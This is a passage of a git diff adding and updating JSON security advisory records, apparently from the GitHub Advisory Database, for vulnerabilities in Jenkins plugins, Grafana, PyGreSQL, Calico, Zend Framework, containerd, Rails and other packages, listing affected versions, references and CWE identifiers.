"http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:19:03Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json b/advisories/github-reviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json new file mode 100644 index 0000000000000..9e4ba3a2b2e43 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj63-95xc-jc4v", + "modified": "2024-01-30T21:20:20Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10385" + ], + "summary": "Jenkins eggplant-plugin Plugin stores credentials in plain text ", + "details": "Jenkins eggPlant Plugin 2.2 and earlier stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:eggplant-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10385" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1430" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-834/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:20:20Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json b/advisories/github-reviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json new file mode 100644 index 0000000000000..4f953df43793a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp44-8vwr-xwmv", + "modified": "2024-01-30T21:18:20Z", + "published": "2022-05-24T22:00:44Z", + "aliases": [ + "CVE-2019-10428" + ], + "summary": "Jenkins Aqua Security Scanner Plugin showed plain text password in configuration form ", + "details": "Jenkins Aqua Security Scanner Plugin 3.0.17 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aqua-security-scanner" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.17" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10428" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1508" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:18:20Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json b/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json index 4da44729b5f8d..ffcc75512fc6a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json +++ b/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json @@ -22,10 +22,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0.0" }, { - "fixed": "1.12.14" + "fixed": "2.4.6" } ] } @@ -41,10 +41,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0.0" + "introduced": "2.5.0" }, { - "fixed": "2.4.6" + "fixed": "2.5.2" } ] } @@ -53,17 +53,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework" + "name": "zendframework/zendframework1" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.5.0" + "introduced": "1.12.0" }, { - "fixed": "2.5.2" + "fixed": "1.12.14" } ] } @@ -79,7 +79,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.0.1" @@ -87,6 +87,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zendframework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.12.0" + }, + { + "fixed": "1.12.14" + } + ] + } + ] } ], "references": [ @@ -106,6 +125,22 @@ "type": "WEB", "url": "https://github.com/zendframework/zf1/commit/ff7edddf1410b44b5ead857c02698aad9f748d1b" }, + { + "type": "WEB", + "url": "https://framework.zend.com/security/advisory/ZF2015-06" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-5161.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2015-5161.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendxml/CVE-2015-5161.yaml" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200228055156/http://www.securityfocus.com/bid/76177" @@ -145,6 +180,10 @@ { "type": "WEB", "url": "http://www.debian.org/security/2015/dsa-3340" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/76177" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json b/advisories/github-reviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json new file mode 100644 index 0000000000000..b409f2f96222e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xr3x-62qw-vc4w", + "modified": "2024-02-01T21:47:24Z", + "published": "2022-05-24T17:24:21Z", + "aliases": [ + "CVE-2020-11110" + ], + "summary": "Grafana stored XSS", + "details": "Grafana through 6.7.1 allows stored XSS.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.7.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.7.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11110" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/23254" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/fb114a75241aaef4c08581b42509c750738b768a" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200810-0002/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:47:24Z", + "nvd_published_at": "2020-07-27T13:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json b/advisories/github-reviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json new file mode 100644 index 0000000000000..d890e4f4d9a31 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xv6x-43gq-4hfj", + "modified": "2024-02-08T21:31:52Z", + "published": "2022-05-02T03:40:08Z", + "aliases": [ + "CVE-2009-2940" + ], + "summary": "PyGreSQL Might Be Vulnerable to Encoding-Based SQL Injection", + "details": "PyGreSQL 3.8 did not use PostgreSQL’s safe `string` and `bytea` functions in its own escaping functions. As a result, applications written to use PyGreSQL’s escaping functions are vulnerable to SQL injections when processing certain multi-byte character sequences. Because the safe functions require a database connection, to maintain backwards compatibility, `pg.escape_string()` and `pg.escape_bytea()` are still available, but applications will have to be adjusted to use the new `pyobj.escape_string()` and `pyobj.escape_bytea()` functions. For example, code containing:\n\n```python\nimport pg\nconnection = pg.connect(...)\nescaped = pg.escape_string(untrusted_input)\n```\nshould be adjusted to use:\n\n```python\nimport pg\nconnection = pg.connect(...)\nescaped = connection.escape_string(untrusted_input)\n```", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "PyGreSQL" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.8.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "PyGreSQL" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0" + }, + { + "fixed": "4.1" + } + ] + } + ], + "versions": [ + "4.0" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2940" + }, + { + "type": "WEB", + "url": "https://github.com/PyGreSQL/PyGreSQL/commit/8e19320b130946eed6f043297e3e4e005a523612" + }, + { + "type": "WEB", + "url": "https://github.com/PyGreSQL/PyGreSQL/commit/f7237d773e6f4d5a7da3d99bb6bc5062bd07935e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/PyGreSQL/PyGreSQL" + }, + { + "type": "WEB", + "url": "http://ubuntu.com/usn/usn-870-1" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2009/dsa-1911" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:31:52Z", + "nvd_published_at": "2009-10-22T16:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json b/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json index ee35eca3c83d8..8652b5b844939 100644 --- a/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json +++ b/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json @@ -71,6 +71,14 @@ "type": "PACKAGE", "url": "https://github.com/containerd/containerd" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/REOZCUAPCA7NFDWYBDYX6EYXWLHABKBO/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WSIGDBHAB3I75JBJNGWEPBTJPS2FOVHD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/REOZCUAPCA7NFDWYBDYX6EYXWLHABKBO/" @@ -79,6 +87,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSIGDBHAB3I75JBJNGWEPBTJPS2FOVHD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5162" diff --git a/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json b/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json index 93b72563b8b4d..b70ca034c58df 100644 --- a/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json +++ b/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json @@ -169,14 +169,6 @@ { "type": "WEB", "url": "https://www.neos.io/blog/xss-in-various-backend-modules.html" - }, - { - "type": "WEB", - "url": "http://cms.com" - }, - { - "type": "WEB", - "url": "http://neos.com" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json b/advisories/github-reviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json new file mode 100644 index 0000000000000..7a48c85793215 --- /dev/null +++ b/advisories/github-reviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json @@ -0,0 +1,99 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9394-xfq9-6qrp", + "modified": "2024-02-02T20:16:57Z", + "published": "2022-06-07T00:00:33Z", + "aliases": [ + "CVE-2022-28224" + ], + "summary": "Calico vulnerable to pod route hijacking", + "details": "Clusters using Calico (version 3.22.1 and below), Calico Enterprise (version 3.12.0 and below), may be vulnerable to route hijacking with the floating IP feature. Due to insufficient validation, a privileged attacker may be able to set a floating IP annotation to a pod even if the feature is not enabled. This may allow the attacker to intercept and reroute traffic to their compromised pod.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/projectcalico/calico" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.22.0" + }, + { + "fixed": "3.22.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/projectcalico/calico" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.21.0" + }, + { + "fixed": "3.21.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/projectcalico/calico" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.20.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28224" + }, + { + "type": "PACKAGE", + "url": "https://github.com/projectcalico/calico" + }, + { + "type": "WEB", + "url": "https://www.tigera.io/security-bulletins-tta-2022-001/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:16:57Z", + "nvd_published_at": "2022-06-06T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json b/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json index a4585a1035c6b..801ddcbf6a4e4 100644 --- a/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json +++ b/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json @@ -64,6 +64,14 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00012.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AGRLWBEB3S5AU3D4TTROIS7O6QPHDTRH/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NHDACMCLWE32BZZTSNWQPIFUAD5I6Q47/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AGRLWBEB3S5AU3D4TTROIS7O6QPHDTRH/" diff --git a/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json b/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json index e01304e14fc0d..e234587824f41 100644 --- a/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json +++ b/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json @@ -67,6 +67,10 @@ { "type": "WEB", "url": "https://github.com/dompdf/dompdf/releases/tag/v2.0.1" + }, + { + "type": "WEB", + "url": "https://tantosec.com/blog/cve-2022-41343/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json b/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json index ae4a836e01f1c..cafb59536d4c2 100644 --- a/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json +++ b/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json @@ -62,6 +62,30 @@ ] } ] + }, + { + "package": { + "ecosystem": "npm", + "name": "hoek" + }, + "ecosystem_specific": { + "affected_functions": [ + "(hoek).clone" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "6.1.3" + } + ] + } + ] } ], "references": [ diff --git a/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json b/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json index 26caad6919941..47cc97c5f269a 100644 --- a/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json +++ b/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json @@ -56,6 +56,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0059.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0014/" diff --git a/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json b/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json index 5345103784bc7..fd7442d468a2f 100644 --- a/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json +++ b/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json @@ -33,6 +33,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "fooman/tcpdf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.2.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "la-haute-societe/tcpdf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.2.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "spoonity/tcpdf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.2.22" + } + ] + } + ] } ], "references": [ @@ -52,6 +109,22 @@ "type": "WEB", "url": "https://contao.org/en/news/security-vulnerability-cve-2018-17057.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/fooman/tcpdf/CVE-2018-17057.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/la-haute-societe/tcpdf/CVE-2018-17057.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/spoonity/tcpdf/CVE-2018-17057.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/tecnickcom/tcpdf/CVE-2018-17057.yaml" + }, { "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/wallabag/tcpdf/CVE-2018-17057.yaml" diff --git a/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json b/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json index af61eb824d195..f53cb16c11243 100644 --- a/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json +++ b/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json @@ -82,6 +82,10 @@ { "type": "WEB", "url": "https://github.com/containerd/containerd/releases/tag/v1.6.12" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json b/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json index c3576d54df5ad..b50fcfa4d86d8 100644 --- a/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json +++ b/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json @@ -28,7 +28,7 @@ "introduced": "0" }, { - "last_affected": "4.3.1" + "fixed": "4.5.0" } ] } @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/containers/podman/pull/16315" }, + { + "type": "WEB", + "url": "https://github.com/containers/podman/commit/c8eeab21cf0a4f670be0cd399dd06fd5d4e06dfe" + }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144983" diff --git a/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json b/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json index 975aff7592e77..984e4907fd163 100644 --- a/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json +++ b/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hq7p-j377-6v63", - "modified": "2023-05-16T15:47:47Z", + "modified": "2024-02-02T16:49:27Z", "published": "2023-01-18T18:20:19Z", "aliases": [ "CVE-2023-22794" @@ -98,6 +98,10 @@ "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activerecord/CVE-2023-22794.yml" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0008/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5372" diff --git a/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json b/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json index 64417a3aaf35e..2ec37c1d77de9 100644 --- a/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json +++ b/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p84v-45xj-wwqj", - "modified": "2023-02-10T22:06:15Z", + "modified": "2024-02-02T16:50:44Z", "published": "2023-01-18T18:23:34Z", "aliases": [ "CVE-2023-22792" @@ -79,6 +79,10 @@ "type": "WEB", "url": "https://discuss.rubyonrails.org/t/cve-2023-22792-possible-redos-based-dos-vulnerability-in-action-dispatch/82115" }, + { + "type": "PACKAGE", + "url": "https://github.com/rails/rails" + }, { "type": "WEB", "url": "https://github.com/rails/rails/releases/tag/v7.0.4.1" @@ -90,11 +94,20 @@ { "type": "WEB", "url": "https://rubyonrails.org/2023/1/17/Rails-Versions-6-0-6-1-6-1-7-1-7-0-4-1-have-been-released" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0007/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2023/dsa-5372" } ], "database_specific": { "cwe_ids": [ - "CWE-1333" + "CWE-1333", + "CWE-400" ], "severity": "LOW", "github_reviewed": true, diff --git a/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json b/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json index a3b12d188fa38..5e7a68b5b3a59 100644 --- a/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json +++ b/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0011.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json b/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json index 2411ad953b8b5..e81289b231400 100644 --- a/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json +++ b/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3vrc-rrpw-r5pw", - "modified": "2023-03-01T20:46:06Z", + "modified": "2024-02-08T12:30:48Z", "published": "2023-02-19T18:30:21Z", "aliases": [ "CVE-2014-125087" @@ -56,6 +56,10 @@ "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/releases/tag/v1.2" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0009/" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.221480" diff --git a/advisories/github-reviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json b/advisories/github-reviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json new file mode 100644 index 0000000000000..9aab29902462f --- /dev/null +++ b/advisories/github-reviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3v2-5388-v8pw", + "modified": "2024-01-30T23:16:38Z", + "published": "2023-02-15T21:30:30Z", + "aliases": [ + "CVE-2023-23848" + ], + "summary": "CSRF vulnerability in Jenkins Coverity Plugin allow capturing credentials", + "details": "Missing permission checks in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:synopsys-coverity" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23848" + }, + { + "type": "WEB", + "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:16:38Z", + "nvd_published_at": "2023-02-15T19:15:00Z" + } +} \ No newline at end of file diff --git 